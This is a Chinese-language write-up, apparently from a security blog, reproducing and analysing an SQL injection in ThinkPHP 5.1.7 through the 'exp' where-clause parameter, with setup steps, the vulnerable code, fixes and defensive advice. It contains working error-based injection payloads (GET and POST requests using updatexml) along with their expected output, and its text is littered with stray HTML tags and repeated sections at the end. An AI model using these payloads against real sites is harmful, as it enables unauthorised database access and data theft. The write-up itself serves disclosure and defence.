ThinkPHP 5.1.7 注入漏洞复现与分析<\/h1>

漏洞概述<\/h2>
ThinkPHP 5.1.7 版本中存在SQL注入漏洞，该漏洞源于框架对输入参数的处理不当，导致攻击者可以构造恶意输入实现SQL注入攻击。<\/p>

漏洞环境搭建<\/h2>

安装ThinkPHP 5.1.7版本：<\/li> <\/ol>

composer create-project topthink\/think=5.1.7 tp517
<\/code><\/pre>

创建测试控制器：<\/li>
<\/ol>
\/\/ application\/index\/controller\/Index.php
<\/span><\/span><\/span><\/span>namespace<\/span> app\index\controller<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> Index<\/span>
<\/span><\/span>{
<\/span><\/span>    public<\/span> function<\/span> index<\/span>()
<\/span><\/span>    {
<\/span><\/span>        $id =<\/span> input<\/span>('id'<\/span>);
<\/span><\/span>        $user =<\/span> db<\/span>('user'<\/span>)-><\/span>where<\/span>('id'<\/span>, $id)-><\/span>find<\/span>();
<\/span><\/span>        return<\/span> json<\/span>($user);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
创建测试数据表：<\/li>
<\/ol>
CREATE<\/span> TABLE<\/span> `<\/span>user<\/span>`<\/span> (
<\/span><\/span>  `<\/span>id`<\/span> int(11<\/span>) NOT<\/span> NULL<\/span> AUTO_INCREMENT,
<\/span><\/span>  `<\/span>username`<\/span> varchar(255<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  `<\/span>password`<\/span> varchar(255<\/span>) DEFAULT<\/span> NULL<\/span>,
<\/span><\/span>  PRIMARY<\/span> KEY<\/span> (`<\/span>id`<\/span>)
<\/span><\/span>) ENGINE=<\/span>InnoDB DEFAULT<\/span> CHARSET=<\/span>utf8;
<\/span><\/span>
<\/span><\/span>INSERT<\/span> INTO<\/span> `<\/span>user<\/span>`<\/span> VALUES<\/span> (1<\/span>, 'admin'<\/span>, '123456'<\/span>);
<\/span><\/span><\/code><\/pre>漏洞复现步骤<\/h2>

构造恶意请求：<\/li>
<\/ol>
http:\/\/yourdomain.com\/index.php\/index\/index\/index?id[0]=exp&id[1]==1 and updatexml(1,concat(0x7e,user(),0x7e),1)
<\/code><\/pre>

或者使用POST请求：<\/li>
<\/ol>
POST<\/span> \/index.php\/index\/index\/index HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> yourdomain.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>id[0]=exp&id[1]==1 and updatexml(1,concat(0x7e,user(),0x7e),1)
<\/span><\/span><\/code><\/pre>
预期响应：<\/li>
<\/ol>
<root><\/span>XPATH syntax error: '~root@localhost~'<\/root><\/span>
<\/span><\/span><\/code><\/pre>漏洞原理分析<\/h2>


漏洞位于thinkphp\/library\/think\/db\/Builder.php<\/code>文件中的parseWhereItem<\/code>方法<\/p>
<\/li>

关键代码片段：<\/p>
<\/li>
<\/ol>
\/\/ where子句解析时未充分过滤EXP表达式
<\/span><\/span><\/span><\/span>if<\/span> ($exp ==<\/span> 'exp'<\/span> &&<\/span> !<\/span>is_null<\/span>($value)) {
<\/span><\/span>    $whereStr .=<\/span> $key .<\/span> ' '<\/span> .<\/span> $value;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
攻击者可以通过构造数组参数，利用EXP表达式直接将恶意SQL代码注入到查询中<\/li>
<\/ol>
漏洞修复方案<\/h2>


升级到ThinkPHP 5.1.8或更高版本<\/p>
<\/li>

临时修复方案（修改parseWhereItem<\/code>方法）：<\/p>
<\/li>
<\/ol>
if<\/span> ($exp ==<\/span> 'exp'<\/span> &&<\/span> !<\/span>is_null<\/span>($value)) {
<\/span><\/span>    \/\/ 添加过滤或白名单验证
<\/span><\/span><\/span><\/span>    if<\/span> (!<\/span>preg_match<\/span>('\/^[a-zA-Z0-9_\.\s=<>]+$\/'<\/span>, $value)) {
<\/span><\/span>        throw<\/span> new<\/span> Exception<\/span>('invalid exp expression'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    $whereStr .=<\/span> $key .<\/span> ' '<\/span> .<\/span> $value;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
输入验证：<\/li>
<\/ol>
\/\/ 在控制器中对输入进行严格验证
<\/span><\/span><\/span><\/span>$id =<\/span> input<\/span>('id\/d'<\/span>); \/\/ 强制转换为整数
<\/span><\/span><\/span><\/code><\/pre>漏洞利用限制<\/h2>


需要应用程序使用where()<\/code>方法且未对输入参数进行严格过滤<\/p>
<\/li>

需要数据库配置支持错误信息回显（用于报错注入）<\/p>
<\/li>

在最新版本中已修复，建议所有用户升级<\/p>
<\/li>
<\/ol>
防御建议<\/h2>


对所有用户输入进行严格验证和过滤<\/p>
<\/li>

使用参数化查询或预处理语句<\/p>
<\/li>

最小化数据库操作权限<\/p>
<\/li>

关闭生产环境的错误信息显示<\/p>
<\/li>

定期更新框架到最新版本<\/p>
<\/li>
<\/ol>
参考链接<\/h2>

ThinkPHP官方更新日志<\/li>
漏洞披露平台相关报告<\/li>
OWASP SQL注入防护指南<\/li>
<\/ul>

ThinkPHP 5.1.7 注入漏洞复现与分析<\/h1>

漏洞概述<\/h2> ThinkPHP 5.1.7 版本中存在SQL注入漏洞，该漏洞源于框架对输入参数的处理不当，导致攻击者可以构造恶意输入实现SQL注入攻击。<\/p>

参考链接<\/h2> ThinkPHP官方更新日志<\/li> 漏洞披露平台相关报告<\/li> OWASP SQL注入防护指南<\/li> <\/ul>

漏洞概述<\/h2>
ThinkPHP 5.1.7 版本中存在SQL注入漏洞，该漏洞源于框架对输入参数的处理不当，导致攻击者可以构造恶意输入实现SQL注入攻击。<\/p>

参考链接<\/h2>

ThinkPHP官方更新日志<\/li>
漏洞披露平台相关报告<\/li>
OWASP SQL注入防护指南<\/li> <\/ul>